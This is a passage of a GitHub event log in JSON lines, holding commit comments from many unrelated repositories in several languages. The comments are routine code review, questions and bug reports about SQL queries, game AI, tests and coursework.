{"id":"7919397248","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29597820,"position":17,"line":52,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"5a4b2bd74d573cdb51606e11d9e91c663ab6e197","created_at":"2018-07-04T16:38:05Z","updated_at":"2018-07-04T16:38:05Z","author_association":"CONTRIBUTOR","body":"The AI doesn't rely on memory anymore, it will just evaluate when it is in the neutral state and save that"}},"created_at":"2018-07-04T16:38:05Z"}
{"id":"7919397355","type":"CommitCommentEvent","actor":{"login":"juan-herrador"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597821,"position":null,"line":null,"path":null,"commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:38:08Z","updated_at":"2018-07-04T16:38:08Z","author_association":"OWNER","body":"Good job man! I really like the approach. Sorry for adding so many comments, but mostly are opinions to start a discussion "}},"created_at":"2018-07-04T16:38:08Z"}
{"id":"7919398248","type":"CommitCommentEvent","actor":{"login":"andersonaddo"},"repo":{"name":"andersonaddo/Generic-Inventory-Manager"},"payload":{"comment":{"id":29597823,"position":null,"line":null,"path":null,"commit_id":"65872d76e6c362be9f9711d89bfd2d31e3187c46","created_at":"2018-07-04T16:38:21Z","updated_at":"2018-07-04T16:38:21Z","author_association":"OWNER","body":"@Ogoe1 Look at the variable names. You didn't capitalize some characters that were capitalized in your fxml file, so you were getting `NullPointerException\" errors."}},"created_at":"2018-07-04T16:38:21Z"}
{"id":"7919400953","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29597829,"position":8,"line":8,"path":"ticketing/views/UserStore.py","commit_id":"c32a9c6a0539cd95a80d1d902c9b7fd1e8b98d00","created_at":"2018-07-04T16:39:10Z","updated_at":"2018-07-04T16:39:10Z","author_association":"COLLABORATOR","body":"this function does return what you want, but it would be inefficient because you make several calls to the sql database (which is slow as a file or a server)\r\nThis can be done by executing 1 sql command, \"SELECT FirstName, LastName, CompanyName, ... FROM users WHERE Username=?\", (f_name, l_name, c_name, ...)"}},"created_at":"2018-07-04T16:39:10Z"}
{"id":"7919404386","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29597840,"position":27,"line":27,"path":"ticketing/views/UserStore.py","commit_id":"c32a9c6a0539cd95a80d1d902c9b7fd1e8b98d00","created_at":"2018-07-04T16:40:08Z","updated_at":"2018-07-04T16:40:08Z","author_association":"COLLABORATOR","body":"i believe this should work, but have you tested it to be sure? "}},"created_at":"2018-07-04T16:40:08Z"}
{"id":"7919405077","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29597841,"position":13,"line":13,"path":"tests/qgraph/raspi2-machine.c","commit_id":"c9cbe1c4cd7aaf6bb86845536a20b3d775b3b2f2","created_at":"2018-07-04T16:40:19Z","updated_at":"2018-07-04T16:40:19Z","author_association":"NONE","body":"You can decide which are useful, in any case no #### are used in the usual coding style."}},"created_at":"2018-07-04T16:40:19Z"}
{"id":"7919406083","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29597843,"position":6,"line":770,"path":"tests/Makefile.include","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T16:40:36Z","updated_at":"2018-07-04T16:40:36Z","author_association":"NONE","body":"No, tests/test-qgraph.c. Typo."}},"created_at":"2018-07-04T16:40:36Z"}
{"id":"7919407252","type":"CommitCommentEvent","actor":{"login":"p3x-robot"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29597845,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-04T16:40:59Z","updated_at":"2018-07-04T16:40:59Z","author_association":"NONE","body":"which kmod? is this???\r\nhttps://cdn.corifeus.com/lede/17.01.4/targets/mvebu/generic/packages/    \r\n\r\nhttps://cdn.corifeus.com/lede/17.01.4/targets/mvebu/generic/packages/kmod-mwlwifi_4.4.92%2B10.3.8.0.git-2018-06-20-1_arm_cortex-a9_vfpv3.ipk  \r\n\r\nthis?\r\n\r\nbut actually, i can even build it, but with the image builder it throws errors, but i find it now ... some gcc version or binutils or something like that, now OpeWrt 18 NodeJs 10.5 is throws errors as well. This 18 RC1 is really messed for now.\r\n\r\nweird, this is reverse, really...\r\n\r\nI have upgraded to mwlwifi that is for sure."}},"created_at":"2018-07-04T16:40:59Z"}
{"id":"7919408182","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29597846,"position":39,"line":39,"path":"ticketing/views/UserStore.py","commit_id":"c32a9c6a0539cd95a80d1d902c9b7fd1e8b98d00","created_at":"2018-07-04T16:41:17Z","updated_at":"2018-07-04T16:41:17Z","author_association":"COLLABORATOR","body":"also, have you tried testing this to be sure it works? "}},"created_at":"2018-07-04T16:41:17Z"}
{"id":"7919409886","type":"CommitCommentEvent","actor":{"login":"fredrike"},"repo":{"name":"Naesstrom/sparsnas_decoder"},"payload":{"comment":{"id":29597850,"position":11,"line":11,"path":"config.json","commit_id":"a6debed65d08cafd898c4cb7fa589260dcc103f8","created_at":"2018-07-04T16:41:46Z","updated_at":"2018-07-04T16:41:46Z","author_association":"NONE","body":"du måste escapa med \"\""}},"created_at":"2018-07-04T16:41:46Z"}
{"id":"7919410083","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29597851,"position":8,"line":8,"path":"ticketing/views/MessageDb.py","commit_id":"c32a9c6a0539cd95a80d1d902c9b7fd1e8b98d00","created_at":"2018-07-04T16:41:50Z","updated_at":"2018-07-04T16:41:50Z","author_association":"COLLABORATOR","body":"these can all be converted into 1 sql execute command"}},"created_at":"2018-07-04T16:41:50Z"}
{"id":"7919410569","type":"CommitCommentEvent","actor":{"login":"olberger"},"repo":{"name":"olberger/fedora"},"payload":{"comment":{"id":29597852,"position":16,"line":11,"path":"script/virtualbox.sh","commit_id":"f213402baa90c961762aba465d5fb8e3a5b94cf6","created_at":"2018-07-04T16:41:59Z","updated_at":"2018-07-04T16:41:59Z","author_association":"OWNER","body":"That's buggy as hell : should be $KERN_DIR of course... will have to revise my patch ;-)"}},"created_at":"2018-07-04T16:41:59Z"}
{"id":"7919412384","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29597856,"position":23,"line":23,"path":"ticketing/views/MessageDb.py","commit_id":"c32a9c6a0539cd95a80d1d902c9b7fd1e8b98d00","created_at":"2018-07-04T16:42:30Z","updated_at":"2018-07-04T16:42:30Z","author_association":"COLLABORATOR","body":"dont forget you have to call \".fetchone()\" or \".fetchall()\" to finally retrieve the data from the database. \r\njust calling execute does not retrieve the data"}},"created_at":"2018-07-04T16:42:30Z"}
{"id":"7919413538","type":"CommitCommentEvent","actor":{"login":"mvl22"},"repo":{"name":"DoccyB/cycledata"},"payload":{"comment":{"id":29597858,"position":null,"line":null,"path":null,"commit_id":"43dfd608fcb1d1f3e33a377168073e21b15a6f14","created_at":"2018-07-04T16:42:54Z","updated_at":"2018-07-04T16:42:54Z","author_association":"COLLABORATOR","body":"> But don't I still need the \"$database = new database;\" line to be able to use methods from the database class?\r\n\r\nYes, you still need to load the database. We'll discuss on Friday how to avoid doing that every time you need to run a method in the database class."}},"created_at":"2018-07-04T16:42:54Z"}
{"id":"7919415331","type":"CommitCommentEvent","actor":{"login":"fredrike"},"repo":{"name":"Naesstrom/sparsnas_decoder"},"payload":{"comment":{"id":29597861,"position":16,"line":16,"path":"config.json","commit_id":"a6debed65d08cafd898c4cb7fa589260dcc103f8","created_at":"2018-07-04T16:43:28Z","updated_at":"2018-07-04T16:43:28Z","author_association":"NONE","body":"din rtl-sdr finns på `/dev/bus/usb`\r\n\r\nSå:\r\n```json\r\n\"devices\": \"/dev/bus/usb:/dev/bus/usb:rw\",\r\n```"}},"created_at":"2018-07-04T16:43:28Z"}
{"id":"7919415569","type":"CommitCommentEvent","actor":{"login":"MohnishSareen"},"repo":{"name":"MohnishSareen/bootcamp-group-web-project"},"payload":{"comment":{"id":29597862,"position":null,"line":null,"path":null,"commit_id":"444f313420739b0f7f56f6c53f03c5c11da1cbbb","created_at":"2018-07-04T16:43:32Z","updated_at":"2018-07-04T16:43:32Z","author_association":"OWNER","body":"Put everything in my folder"}},"created_at":"2018-07-04T16:43:32Z"}
{"id":"7919418180","type":"CommitCommentEvent","actor":{"login":"Ronimeister"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29597866,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-04T16:44:17Z","updated_at":"2018-07-04T16:44:17Z","author_association":"OWNER","body":"Здравствуйте, есть вопрос по поводу задания на НОД: все перегруженные\r\nметоды(если я использую ValueTuple) должны возвращать время? Ну, т.е., во\r\nвсех ли публичных методах мне реализовывать подсчёт времени или дб. как\r\nметоды с временем, так и без него?\r\n\r\n3 июля 2018 г., 15:33 пользователь Anzhelika Kravchuk <\r\nnotifications@github.com> написал:\r\n\r\n> Вот эти методы EuclideanGCD(int firstNumber, int secondNumber, params\r\n> int[] numbers) + EuclideanGCD(int firstNumber, int secondNumber, params\r\n> int[] numbers , out TimeSpan time ) , вообще взрывают мне мозг!\r\n> я не могу ничем оправдать этот int firstNumber, int secondNumber, params\r\n> int[] numbers список параметров.\r\n>\r\n> > On 3 Jul 2018, at 15:30, Alexey <notifications@github.com> wrote:\r\n> >\r\n> > Т.е., сделать методы а-ля EuclideanGCD(int firstNumber, int\r\n> secondNumber)\r\n> > + EuclideanGCD(int firstNumber, int secondNumber, out TimeSpan time) +\r\n> > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers) +\r\n> > EuclideanGCD(int firstNumber, int secondNumber, params int[] numbers ,\r\n> out\r\n> > TimeSpan time ) ?\r\n> >\r\n> >\r\n> > 3 июля 2018 г., 15:23 пользователь Anzhelika Kravchuk <\r\n> > notifications@github.com> написал:\r\n> >\r\n> > > Идея была хорошая, реализация не годиться. Что я хотела бы увидеть,\r\n> как\r\n> > > доступную публичную функциональность класса - это 3 (или 6 все зависит\r\n> от\r\n> > > варианта возвращения времени счета) перегруженных версии для 1-го\r\n> алгоритма\r\n> > > и 3 (или 6) для 2-го, при этом, я не должна передавать ничего кроме\r\n> > > числовых значений. А вот все остальное в плане избавления от копи\r\n> паста -\r\n> > > на ваше усмотрение). Пользователь вашего кода должен знать только то,\r\n> что\r\n> > > он использует именно указанную модификацию для указанного количества\r\n> > > числел, и опционально решать - нужно или нет ему время.\r\n> > >\r\n> > > —\r\n> > > You are receiving this because you authored the thread.\r\n> > > Reply to this email directly, view it on GitHub\r\n> > > <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/\r\n> 4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579832>,\r\n> > > or mute the thread\r\n> > > <https://github.com/notifications/unsubscribe-\r\n> auth/AeM1XrCNbo4ym4xouuMi2d-VLvH4UI6Dks5uC2I4gaJpZM4VAt6f>\r\n> > > .\r\n> > >\r\n> > —\r\n> > You are receiving this because you commented.\r\n> > Reply to this email directly, view it on GitHub <https://github.com/\r\n> Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9\r\n> a1016daa30#commitcomment-29579922>, or mute the thread <\r\n> https://github.com/notifications/unsubscribe-auth/\r\n> AKCHstnt1g1M5dQDCbP8NuzPO5i1OLt_ks5uC2PVgaJpZM4VAt6f>.\r\n>\r\n> >\r\n>\r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub\r\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/4ff58661eda38d9d564017029a28a9a1016daa30#commitcomment-29579954>,\r\n> or mute the thread\r\n> <https://github.com/notifications/unsubscribe-auth/AeM1XkXiSLJkcVHW8q8lok4iYPhf0PhJks5uC2SrgaJpZM4VAt6f>\r\n> .\r\n>\r\n"}},"created_at":"2018-07-04T16:44:17Z"}
{"id":"7919419175","type":"CommitCommentEvent","actor":{"login":"ashirvadv"},"repo":{"name":"zionesolutions/Ticketing"},"payload":{"comment":{"id":29597867,"position":5,"line":5,"path":"ticketing/views/MessageDb.py","commit_id":"c32a9c6a0539cd95a80d1d902c9b7fd1e8b98d00","created_at":"2018-07-04T16:44:36Z","updated_at":"2018-07-04T16:44:36Z","author_association":"COLLABORATOR","body":"does this need to be imported? you arent using it. \r\n\r\nI recommend using the functions ZioneDb should provide when implementing this UserStore to help keep things consistent"}},"created_at":"2018-07-04T16:44:36Z"}
{"id":"7919424982","type":"CommitCommentEvent","actor":{"login":"yuxizhe"},"repo":{"name":"yuxizhe/ibm-nebulas-server"},"payload":{"comment":{"id":29597877,"position":null,"line":null,"path":null,"commit_id":"4db239b6e76cbc427a9c99263b28fc898e6d2966","created_at":"2018-07-04T16:46:29Z","updated_at":"2018-07-04T16:46:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ca0757e4-472c-4da3-bb01-4158fbfe38d1?env_id=ibm%3Ayp%3Aus-south \"nebulas\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/03c75b85-42c8-405f-9df7-7daf9bf95c65?env_id=ibm%3Ayp%3Aus-south \"nebulas\") deployed [ibm-nebulas-server](https://github.com/yuxizhe/ibm-nebulas-server/releases/tag/deploy-ibm-yp-us-south-yuxizhe2008-yu-20180704-164628 \"deploy-ibm-yp-us-south-yuxizhe2008-yu-20180704-164628\") to [yu](https://console.bluemix.net/apps/b353996b-ddf5-49c4-ba38-6736c0d6fad9?env_id=ibm:yp:us-south \"ibm:yp:us-south:yuxizhe2008:yu\"), including this commit"}},"created_at":"2018-07-04T16:46:29Z"}
{"id":"7919429650","type":"CommitCommentEvent","actor":{"login":"dinosk"},"repo":{"name":"reanahub/reana-job-controller"},"payload":{"comment":{"id":29597884,"position":null,"line":null,"path":null,"commit_id":"b06ebb57772390272d506fa6fcaa00db4617b32b","created_at":"2018-07-04T16:47:58Z","updated_at":"2018-07-04T16:47:58Z","author_association":"MEMBER","body":"WIP improvement* :)"}},"created_at":"2018-07-04T16:47:58Z"}
{"id":"7919430020","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29597886,"position":17,"line":52,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"5a4b2bd74d573cdb51606e11d9e91c663ab6e197","created_at":"2018-07-04T16:48:06Z","updated_at":"2018-07-04T16:48:06Z","author_association":"CONTRIBUTOR","body":"Also, since run runs every frame, and builds the table every frame, and we will just target positions, not actual microbes, we dont need to keep track of removed ones either because its nearlyimpossible for them to disappear the same frame the table is built im pretty sure, and itf it does we can just add a check before it gets the position of its prey or predator that resets the cells AI state."}},"created_at":"2018-07-04T16:48:06Z"}
{"id":"7919434025","type":"CommitCommentEvent","actor":{"login":"kingdido999"},"repo":{"name":"block-dog/news"},"payload":{"comment":{"id":29597892,"position":null,"line":null,"path":null,"commit_id":"04c32e48bb9e153901d5084383e501232963f893","created_at":"2018-07-04T16:49:25Z","updated_at":"2018-07-04T16:49:25Z","author_association":"CONTRIBUTOR","body":"@summerhack 对于组件(Component)的使用我有几点建议：\r\n1. Post的详细信息不建议通过Tag来展示，使用普通的文字链接就可以。如果觉得有组件化的必要，可以考虑命名为`PostMeta`。\r\n2. 对于比较通用的组件，避免定义和传入非组件相关的props。比如Tag，我们不应该将`source`, `author`, `time`作为props传入来修改组件UI。如果需要根据props修改UI，应该提供标准化和通用的名词，比如type类：`primary`, `info`, `error` 或size类：`small`, `large`。还有一点，`tagurl`作为必须的prop是不合理的，很多标签是并不需要链接的。因此传入`onClick`prop (optional)会更为合理。以后创建通用组件之前可以参考[Ant Design](https://ant.design/components/tag/)是如何定义组件以及组件API的。\r\n3. 命名组件props避免含有组件名称。比如Tag，我们应该定义`name`而不是`tagname`。"}},"created_at":"2018-07-04T16:49:25Z"}
{"id":"7919436724","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29597901,"position":null,"line":null,"path":null,"commit_id":"dff66115c407b1e644ff03147a43f62d59919846","created_at":"2018-07-04T16:50:17Z","updated_at":"2018-07-04T16:50:17Z","author_association":"COLLABORATOR","body":"1. TY\r\n2. Era para probar porque al principio no me funcionaban los @Before @BeforeAll y luego me di cuenta que era por un tema de version de junit de 4 a 5.\r\n3. No entendí eso. Lo puse 0,0 para que no me tire error el compilador. No venía al caso probar el Location con lo cual siempre en dichos caso invento valores, 0 u otros.\r\n4. Si, ayer lo vi. Creo que era algo viejo y lo saqué. Caro usó unos en sus test, pero los probé y funcionaban. Creo que fueron intencionales.\r\n5. Dividí en package... creo que vos querias en carpetas. Es muy grave eso?\r\nGeneré el id del objeto \"oid\" en cada uno pues luego para poner en hibernate tengo que decirle cual es el campo id. Lo recuerdo de un proyecto que hice y lo tenia así. El oid lo tengo porque luego al mostrar en listados seguramente me guarde el oid en algún campo para luego operar directamente con el objeto seleccionado en la vista. <input type=\"hidden\" id=\"<% objeto.getOId() %>... />\r\nDe interfaces no hicimos nada. Particularmente nunca usé interfaces y no vi como aplicarlas en este caso. Tendria que preungarte en clase bien como es porque no lo entendí lo que quisiste explicar.\r\nVoy a cambiar Normal a NormalClient, dado que si bien es un User, primero es un Client.\r\n7. lo veremos. Idem anterior\r\n8.  Tendria que ver como arreglar ese test si no puede hacerse eso. De cualquer manera caro hizo otro, yo lo vi y creo que está bien. Testea lo mismo pero de otra forma. No se si vale la pena corregir esto pues ya tenemos otro.\r\n9. Si se puede pero la idea es ver que se ejecute inmediatamente en el 20. Igual se podria acortar el for yhacer que solo vaya al limite y preguntar al fina. Es verdad. Eso ya lo cambié.\r\n10. no lo entendi.. ver siguiente (tampoco tenemos muy en claro algunos test)\r\n11.El test ranking imagino que de unidad y el de uruarios y filtros de integracion. Tampoco lo tenemos muy en claro y vimos que en la teoria estaba pareja la discucion. Realmente no le dimos importancia a ver de que son (meaculpa y tambien la corta duracion del curso y lo rápido que se ve todo)\r\n12 ok\r\n13 ok hay que ver.. no llegamos tan lejos. hay pocos test y ententemos poco de ello.\r\n14 .ty\r\n15. Esto es un tema mas bien conceptual o de forma. Claramente cuando el usuario vaya a crear un restaurant se le va a pedir los datos mas allá si setea los datos en un constructor o usando los setters. No veo problema con esto. "}},"created_at":"2018-07-04T16:50:17Z"}
{"id":"7919437507","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"huangdali/M3U8Manger"},"payload":{"comment":{"id":29597903,"position":null,"line":null,"path":null,"commit_id":"590ad5fb85c7862d1cbb4d066afa5911e53962a6","created_at":"2018-07-04T16:50:33Z","updated_at":"2018-07-04T16:50:33Z","author_association":"NONE","body":"http://161.202.48.248:5500/CJHK4.m3u8 这个地址直播下载 软件直接退回 请问有没有更新"}},"created_at":"2018-07-04T16:50:33Z"}
{"id":"7919443511","type":"CommitCommentEvent","actor":{"login":"Untrustedlife"},"repo":{"name":"Revolutionary-Games/Thrive"},"payload":{"comment":{"id":29597916,"position":17,"line":52,"path":"scripts/microbe_stage/microbe_ai.as","commit_id":"5a4b2bd74d573cdb51606e11d9e91c663ab6e197","created_at":"2018-07-04T16:52:28Z","updated_at":"2018-07-04T16:52:28Z","author_association":"CONTRIBUTOR","body":"(though the state code only runs every 1000 ticks) due to (theintervalremaining variable)"}},"created_at":"2018-07-04T16:52:28Z"}
{"id":"7919444284","type":"CommitCommentEvent","actor":{"login":"silverwind"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29597917,"position":38,"line":307,"path":"github-dark.css","commit_id":"ba0ce82cbe1087b17d184b3dff3c43249c880f01","created_at":"2018-07-04T16:52:43Z","updated_at":"2018-07-04T16:52:43Z","author_association":"MEMBER","body":"@Mottie this change will not persist on the next generation."}},"created_at":"2018-07-04T16:52:43Z"}
{"id":"7919448055","type":"CommitCommentEvent","actor":{"login":"MrGaabriel"},"repo":{"name":"BarryBot/Barry"},"payload":{"comment":{"id":29597927,"position":null,"line":null,"path":null,"commit_id":"c1d42d07dd41d6f09a5e2f62ea33e75f91136739","created_at":"2018-07-04T16:53:57Z","updated_at":"2018-07-04T16:53:57Z","author_association":"CONTRIBUTOR","body":"Só testando o webhook..."}},"created_at":"2018-07-04T16:53:57Z"}
{"id":"7919457939","type":"CommitCommentEvent","actor":{"login":"joseantbr"},"repo":{"name":"joseantbr/scala-matemagicas"},"payload":{"comment":{"id":29597947,"position":null,"line":null,"path":null,"commit_id":"686d763a391f1c3c3e3dfabe59ea30a914da28e5","created_at":"2018-07-04T16:57:13Z","updated_at":"2018-07-04T16:57:13Z","author_association":"OWNER","body":"Añadidas las clases Racional, Numericos e Implicitos.\r\n\r\n#Numericos\r\n* Se añaden las funciones signo (calcula el signo de un entero), máximo común divisor (calcula el mcd de a y b mediante el algoritmo de Euclides), mínimo común múltiplo (calcula el MCM de a y b mediante la fórmula que relaciona el mcd, el MCM y el producto a*b) y aprox (determina si 2 objetos de tipo numérico son aproximadamente iguales).\r\n\r\n#Racional\r\nSe añade la clase racional, que permite representar fracciones mediante un par de enteros.\r\n\r\n* Implementadas suma, resta, producto, cociente y potencias por enteros.\r\n\r\n#Implicitos\r\nRecoge las clases para añadir nuevos métodos sobre tipos predefinidos.\r\n\r\n* Se añaden métodos para operar entre enteros y racionales."}},"created_at":"2018-07-04T16:57:13Z"}
{"id":"7919460167","type":"CommitCommentEvent","actor":{"login":"JesusELuna"},"repo":{"name":"Shumaister/FrbaHotel"},"payload":{"comment":{"id":29597950,"position":null,"line":null,"path":null,"commit_id":"74810ddcf3742b544dfcc646179c9817976553f1","created_at":"2018-07-04T16:57:54Z","updated_at":"2018-07-04T16:57:54Z","author_association":"NONE","body":"![alt text](http://www.infodeportes.com/fotos/2010/2/24.7585.8.962.250.jpg)\r\n"}},"created_at":"2018-07-04T16:57:54Z"}
{"id":"7919461922","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597957,"position":41,"line":142,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:58:28Z","updated_at":"2018-07-04T16:58:28Z","author_association":"COLLABORATOR","body":"yes, this part needs to be refactored, the `null` check here also doesn't make sense\r\n"}},"created_at":"2018-07-04T16:58:28Z"}
{"id":"7919463120","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29597962,"position":13,"line":31,"path":"code/Language/Drasil/Chunk/Eq.hs","commit_id":"b032040f259db486b4b1e988784879bb81cb9d00","created_at":"2018-07-04T16:58:54Z","updated_at":"2018-07-04T16:58:54Z","author_association":"COLLABORATOR","body":"Re: Yes, data definitions are implemented via `QDefinitions` and some have missing information. (e.g. #350)\r\n\r\nRe: Does that mean I should hold off on working on adding the missing information for glassbr's data definitions (i.e. #350) until some design is proposed and discussed?"}},"created_at":"2018-07-04T16:58:54Z"}
{"id":"7919463362","type":"CommitCommentEvent","actor":{"login":"joseantbr"},"repo":{"name":"joseantbr/scala-matemagicas"},"payload":{"comment":{"id":29597963,"position":null,"line":null,"path":null,"commit_id":"686d763a391f1c3c3e3dfabe59ea30a914da28e5","created_at":"2018-07-04T16:58:59Z","updated_at":"2018-07-04T16:58:59Z","author_association":"OWNER","body":"Añadidas las clases **Racional**, **Numericos** e **Implicitos**.\r\n\r\n# Numericos\r\n* Se añaden las funciones *signo* (calcula el signo de un entero), *mcd* (calcula el mcd de a y b mediante el algoritmo de Euclides), *MCM* (calcula el MCM de a y b mediante la fórmula que relaciona el mcd, el MCM y el producto a*b) y *aprox* (determina si 2 objetos de tipo numérico son aproximadamente iguales).\r\n\r\n# Racional\r\nSe añade la clase racional, que permite representar fracciones mediante un par de enteros.\r\n\r\n* Implementadas *suma, resta, producto, cociente y potencias* por enteros.\r\n\r\n# Implicitos\r\nRecoge las clases para añadir nuevos métodos sobre tipos predefinidos.\r\n\r\n* Se añaden métodos para operar entre enteros y racionales."}},"created_at":"2018-07-04T16:58:59Z"}
{"id":"7919463561","type":"CommitCommentEvent","actor":{"login":"Micha0"},"repo":{"name":"juan-herrador/delicious-world-dev"},"payload":{"comment":{"id":29597965,"position":46,"line":147,"path":"level.js","commit_id":"26fe4f5b13925dec40558e42fb679d48d0c8118e","created_at":"2018-07-04T16:59:02Z","updated_at":"2018-07-04T16:59:02Z","author_association":"COLLABORATOR","body":"I'll document these in confluence"}},"created_at":"2018-07-04T16:59:02Z"}
{"id":"7919465188","type":"CommitCommentEvent","actor":{"login":"mesut25"},"repo":{"name":"RaemondBW/firebase-arduino"},"payload":{"comment":{"id":29597967,"position":null,"line":null,"path":null,"commit_id":"a23fb4e0a15e554e401150e25fc742f6a302b4c7","created_at":"2018-07-04T16:59:34Z","updated_at":"2018-07-04T16:59:34Z","author_association":"NONE","body":"\r\nRaemondBW  merhaba bir konuda yardım istiyorum    firebase arduıno  baglandı ok 10 dakı\r\nika sonra erorr. hata  \r\n\r\nneden 10dakika sonra erorr. hata\r\nmesutmelekaslan@hotmail.com"}},"created_at":"2018-07-04T16:59:34Z"}
{"id":"7919465397","type":"CommitCommentEvent","actor":{"login":"oisinf"},"repo":{"name":"oisinf/FYP"},"payload":{"comment":{"id":29597968,"position":null,"line":null,"path":null,"commit_id":"0061ae649d7713f0f345404a1d67a8fe974c2fcb","created_at":"2018-07-04T16:59:38Z","updated_at":"2018-07-04T16:59:38Z","author_association":"OWNER","body":"Project thesis"}},"created_at":"2018-07-04T16:59:38Z"}
{"id":"7919466277","type":"CommitCommentEvent","actor":{"login":"slavazhukov2"},"repo":{"name":"slavazhukov2/webdev-4072018"},"payload":{"comment":{"id":29597970,"position":2,"line":2,"path":"style.css","commit_id":"e785fb599242591cb109a6b4dfbc2774d6baae7e","created_at":"2018-07-04T16:59:54Z","updated_at":"2018-07-04T16:59:54Z","author_association":"OWNER","body":"Андрей, нужен был зеленый квадрат, а получили мы зеленый прямоугольник. Исправить в течении 5 минут"}},"created_at":"2018-07-04T16:59:54Z"}
{"id":"7919467088","type":"CommitCommentEvent","actor":{"login":"fragsman"},"repo":{"name":"carolina46/CIL-Grupo2"},"payload":{"comment":{"id":29597974,"position":null,"line":null,"path":null,"commit_id":"f9d9a9baf6eebf5d9d136c84e26a3f4009d9e29e","created_at":"2018-07-04T17:00:11Z","updated_at":"2018-07-04T17:00:11Z","author_association":"COLLABORATOR","body":"1. Eliminado.\r\n2. Vamos a dejar el que hizo Caro.\r\n3. Lo que intenté hacer ahí es comparar dos strings. user.getUser() me devuelve el String (valor) o sea el nombre de usuario y lo compara con el que quiero crear. Si los strings son iguales entonces el nombre de usuario ya existe y no deberia dejar crearlo.\r\n4. Ver anterior.\r\n5. Falta documentacion a los test lo se.. no le dimos tanta importancia.\r\nNO hay diferencias entre esos test.. uno lo hice yo y el otro caro 🗡 "}},"created_at":"2018-07-04T17:00:11Z"}
{"id":"7919469474","type":"CommitCommentEvent","actor":{"login":"yudiagussetiawan"},"repo":{"name":"nebulasio/web-wallet"},"payload":{"comment":{"id":29597984,"position":16,"line":29,"path":"lib/nebulas.js","commit_id":"fba4186af119b378d2341059ee4aa57d1bf0257f","created_at":"2018-07-04T17:00:52Z","updated_at":"2018-07-04T17:00:52Z","author_association":"NONE","body":" var KeyVersion3 = 3;\r\n var KeyCurrentVersion = 4;\r\n \r\n-/**\r\n- * @typedef {Object} KeyOptions\r\n- * @property {Buffer} salt\r\n- * @property {Buffer} iv\r\n- * @property {String} kdf\r\n- * @property {Number} dklen\r\n- * @property {Number} c\r\n- * @property {Number} n\r\n- * @property {Number} r\r\n- * @property {Number} p\r\n- * @property {String} cipher\r\n- * @property {Buffer} uuid\r\n- * @global"}},"created_at":"2018-07-04T17:00:52Z"}
{"id":"7919469957","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29597986,"position":11,"line":11,"path":"Algorithms/GCDFinder.cs","commit_id":"4ff58661eda38d9d564017029a28a9a1016daa30","created_at":"2018-07-04T17:01:00Z","updated_at":"2018-07-04T17:01:00Z","author_association":"NONE","body":"Добрый вечер.\n\n\n\n\nЯ бы сказала, учитывая наличие valuetuple, что будут только перегруженные версии методов возвращающие пару - значение и время.\n\n\n\n\n________________________________\n\n\nBest regards, Anzhelika Kravchuk.\n\n\n\n\n\n\n\nОт: Alexey Kanunnikov\n\n\nОтправлено: среда, 4 июля, 19:44\n\n\nТема: Re: [Ronimeister/NET.S.2018.Kanunnikov.03] Two Day-3 tasks added. (4ff5866)\n\n\nКому: Ronimeister/NET.S.2018.Kanunnikov.03\n\n\nКопия: Anzhelika Kravchuk, Comment\n\n\n\n\n\n\nЗдравствуйте, есть вопрос по поводу задания на НОД: все перегруженные \n\n\nметоды(если я использую ValueTuple) должны возвращать время? Ну, т.е., во \n\n\nвсех ли публичных методах мне реализовывать подсчёт времени или дб. как \n\n\nметоды с временем, так и без него? \n\n\n\n\n3 июля 2018 г., 15:33 пользователь 